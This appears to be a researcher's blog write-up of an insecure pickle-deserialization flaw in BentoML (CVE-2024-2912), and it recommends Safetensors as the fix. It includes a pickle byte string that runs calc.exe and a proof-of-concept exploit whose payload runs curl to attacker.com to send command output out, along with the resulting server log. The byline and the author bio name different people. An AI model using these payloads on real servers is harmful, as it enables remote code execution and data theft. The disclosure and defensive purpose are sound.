Written by Laurent Dupont

How I Discovered CVE-2024-2912: Unveiling BentoML Pickle-Based Serialization

This is the story of how I found a remote code execution in BentoML and what it can teach you about securing your AI systems.

BentoML is a popular AI framework used to package and serve models. It makes it very simple for you to turn any model into a REST API.

As part of my usual routine, I began exploring the different methods BentoML used to serialize and deserialize objects, especially machine learning models. All AI models are essentially just objects in a program’s runtime, and in order to transfer these objects, we convert them into a format we can easily store and transfer; this is called serialization. The opposite, the loading or bringing into memory of such a model, is called deserialization. In Python, this deserialization is commonly done using `pickle.’ This is the story of how I discovered CVE-2024-2912, the severity of it, and how `pickle` was the culprit.

What's Pickle, and Why Is It Dangerous?

For anyone unfamiliar with Python, pickle is the default serialization mechanism in the language, converting Python objects into byte streams for easy storage or transmission. While convenient, pickle is known for its inherent dangers when used with untrusted data. Deserialization through pickle allows attackers to inject arbitrary code during the unpickling process. This essentially gives them access to execute malicious code on the server where the object is being deserialized.

Just look at how simple it is. I urge you all to open a Python terminal and run this command:

				
					pickle.loads(b'\x80\x04\x95 \x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\x08calc.exe\x94\x85\x94R\x94.')

Let me guess: You didn’t run that code because you don’t trust me, right? Yet this is what we do all the time when loading AI models.

The models that we all download from various sources are almost always pickle files; the same risk applies if we don’t inspect or validate those files before deserializing them. Pickle is so easy to use, so intuitive, that it’s almost become a blind spot for developers, myself included, up until this point.

The BentoML bug

Enough theory; let’s actually dig into the bug I found in BentoML because I knew the love for pickle in the AI community was big, but not this big!

I found some mentions of `media_type = “application/vnd.bentoml+pickle”` in BentoML. This made me wonder; normally, when I interact with the BentoML service, I’m sending data using JSON, where the media type is `application/json`. When I’m uploading files, I use `multipart/form-data` as the media type. But it seems that BentoML has created its own media type, `application/vnd.bentoml+pickle`, and the name clearly suggests that this data type might expect pickled data.

So, I put together this really simple proof of concept. I create a class `P` that has a `__reduce__` function. This function is used to define how an object should be deserialized and is thus called whenever we deserialize an object. So, I overwrite this function and tell BentoML to make an HTTP request to me, the attacker, with the output of some code I executed.

				
					import pickle, os, requests

class P(object):

   def __reduce__(self):

       return (os.system,("curl http://attacker.com/?result=`id`",))

requests.post('http://bentoml.host.com:3000/summarize', pickle.dumps(P()), headers={"Content-Type": "application/vnd.bentoml+pickle"})

In my attacker webserver, I then get a request showing that indeed my attack worked and I was able to execute commands on the server.

				
					[06/Feb/2024 13:41:59] "GET /?result=uid=1000(kali) HTTP/1.1" 200 -

This is, of course, merely a proof of concept, and any real attacker would be able to gain full access to the system and do with it whatever they please: A remote code execution!

The Solution: Safetensors and Moving Beyond Pickle

Fortunately, the issue with `pickle` has been well-known for years, and alternatives have emerged to address these risks. One of the most promising solutions is Safetensors, a serialization format created specifically for safely handling machine learning models without exposing systems to the dangers of code injection through deserialization.

Unlike pickle, Safetensors is fundamentally different in how it handles data. While pickle is designed to serialize complex Python objects, including executable code, Safetensors restricts serialization to only basic, pure data structures such as tensors, lists, and dictionaries. This restriction ensures that no arbitrary code or executable functions can be serialized or deserialized, effectively preventing any possibility of remote code execution (RCE).

This new standard isn’t just about keeping things secure, it’s about changing the paradigm in how we think about model serving and data serialization. Every framework like BentoML should start adopting Safetensors as their default serialization method so we’ll be able to avoid the risks & exploits associated with pickle altogether.

Conclusion: Why CVE-2024-2912 Should Be a Wake-Up Call

As someone who regularly works on penetration tests and security assessments, I can’t stress enough how important it is to think beyond convenience when designing systems that handle external data. Insecure deserialization vulnerabilities are far more common than people realize, especially in machine learning and AI platforms.

As an AI community, we need to move past unsafe serialization formats as quickly as possible. We like to think that at this point, every developer knows that pickling should not be performed on untrusted data, but that is clearly not the case. Let’s come together as a community and adopt serialization formats that are designed with security in mind, such as Safetensors, which provides a secure way to handle model storage and deployment.

CVE-2024-2912 should be a wake-up call that when it comes to security, you don’t compromise. Don’t let it be just another bug or vulnerability. I hope this will be the last insecure deserialization vulnerability I will find in AI applications, but somehow, I doubt it. Machine learning models and the libraries we use to serve them are powerful, but they can also be a gateway to serious security flaws if we aren’t careful. Let’s be vigilant about how we serialize data and remember that convenience shouldn’t come at the cost of security.

About the Author

Robbe Van Roey is a security consultant with 6 years of experience in the cybersecurity field. During this time, he has become an expert in web application and network penetration testing by responsibly disclosing vulnerabilities, engaging in bug bounty, competing in hacking competitions, and performing penetration tests. He also has top position on the Intigrity bug bounty platform and worked multiple years as hacker manager at Intigrity.